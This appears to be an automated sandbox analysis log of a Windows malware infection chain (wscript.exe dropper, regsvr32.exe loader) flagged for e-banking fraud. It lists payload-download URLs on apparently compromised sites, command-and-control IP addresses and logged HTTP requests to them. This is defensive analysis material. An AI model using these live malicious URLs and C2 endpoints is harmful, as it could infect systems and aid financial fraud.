00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
                        Source: wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
                        Source: wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
                        Source: wscript.exe, 00000001.00000002.454494243.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450088401.0000000004F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/O
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.44.196.120:8080/
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/g
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/i
                        Source: regsvr32.exe, 00000008.00000002.618264606.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/a
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/c
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/h
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/f4)
                        Source: regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/m/Low
                        Source: regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/
                        Source: regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/0/
                        Source: regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000002.618264606.00000000033E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000003.586761426.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.586322272.00000000011C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/#
                        Source: regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/
                        Source: regsvr32.exe, 00000008.00000003.586522117.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.617706041.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
                        Source: regsvr32.exe, 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/
                        Source: regsvr32.exe, 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/dll
                        Source: regsvr32.exe, 00000008.00000003.519602421.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.521824072.00000000011A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/kjgfzohhcvsym/ggkrpukmvfsdmfdi/y
                        Source: wscript.exe, 00000001.00000003.450771495.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454658429.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.435803388.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453651451.0000000004FD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/
                        Source: wscript.exe, 00000001.00000003.450771495.0000000004FCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454658429.0000000004FCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453651451.0000000004FCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.435803388.0000000004FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/G
                        Source: wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453064773.00000000046E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453556691.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
                        Source: wscript.exe, 00000001.00000003.453556691.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454479107.0000000004EEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/35047
                        Source: wscript.exe, 00000001.00000003.435803388.0000000004FBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453651451.0000000004FC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450771495.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450608257.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/R
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
                        Source: wscript.exe, 00000001.00000002.454520022.0000000004F26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450304011.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450088401.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450195483.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com:443/useragreement/ElKHvb4QIQqSrh6Hqm/
                        Source: wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443736381.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442437886.0000000004C63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449180398.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453830092.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450405503.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449627322.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443042100.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004B1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450304011.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443957796.0000000004D29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.436776143.0000000000528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439343018.0000000004AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
                        Source: wscript.exe, 00000001.00000002.454520022.0000000004F26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450304011.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450088401.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450195483.0000000004F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/
                        Source: wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443736381.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442437886.0000000004C63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449180398.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453830092.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450405503.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449627322.0000000004E67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443042100.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004B1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443957796.0000000004D29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.436776143.0000000000528000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439343018.0000000004AEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445771349.0000000004CDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443403718.0000000004CF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450004431.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449367507.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453580767.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439492822.0000000004A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
                        Source: wscript.exe, wscript.exe, 00000001.00000003.438065273.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.446215312.0000000004D5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449163374.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445464334.0000000004D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454128964.0000000000569000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441367000.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.437009350.0000000000519000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.453635476.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450239085.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439815100.0000000004AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449599586.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.439285276.0000000004B00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441612434.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.450137005.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.447642991.0000000004DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.454449863.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440428219.0000000004AE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449909753.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                        Source: wscript.exe, 00000001.00000003.442046071.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443957796.0000000004D29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.443403718.0000000004CF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441384057.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445299386.0000000004D30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.445693425.0000000004D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.449126562.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441209926.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.440989480.0000000004C2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.441692919.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/ublic
                        Source: wscript.exe, 00000001.00000003.450944827.0000000004704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                        Source: unknownHTTP traffic detected: POST /kjgfzohhcvsym/ggkrpukmvfsdmfdi/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
                        Source: unknownDNS traffic detected: queries for: penshorn.org
                        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
                        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.4:49697 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.4:49707 version: TLS 1.2

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 00000008.00000002.617622368.0000000001128000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 7.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.617908467.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.435040931.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.435079769.0000000000C81000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.617991497.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\DWxyui\Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800068187_2_0000000180006818
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000B8787_2_000000018000B878
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800071107_2_0000000180007110
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008D287_2_0000000180008D28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800145557_2_0000000180014555
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C200007_2_00C20000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9709C7_2_00C9709C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9A0007_2_00C9A000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8CC147_2_00C8CC14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C87D6C7_2_00C87D6C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8263C7_2_00C8263C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C88BC87_2_00C88BC8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C98FC87_2_00C98FC8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C880CC7_2_00C880CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C908CC7_2_00C908CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8F8C47_2_00C8F8C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C95CC47_2_00C95CC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C818DC7_2_00C818DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C814D47_2_00C814D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C93CD47_2_00C93CD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C920E07_2_00C920E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C890F87_2_00C890F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C848FC7_2_00C848FC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C83CF47_2_00C83CF4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C958807_2_00C95880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C84C847_2_00C84C84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9CC847_2_00C9CC84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8AC947_2_00C8AC94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C898AC7_2_00C898AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8DCB87_2_00C8DCB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA94BC7_2_00CA94BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9A8B07_2_00C9A8B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9C44C7_2_00C9C44C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C878407_2_00C87840
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9C0587_2_00C9C058
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA54507_2_00CA5450
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9B4607_2_00C9B460
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C82C787_2_00C82C78
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8C0787_2_00C8C078
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8B07C7_2_00C8B07C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C96C707_2_00C96C70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8D4747_2_00C8D474
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C894087_2_00C89408
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C87C087_2_00C87C08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C810007_2_00C81000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA181C7_2_00CA181C
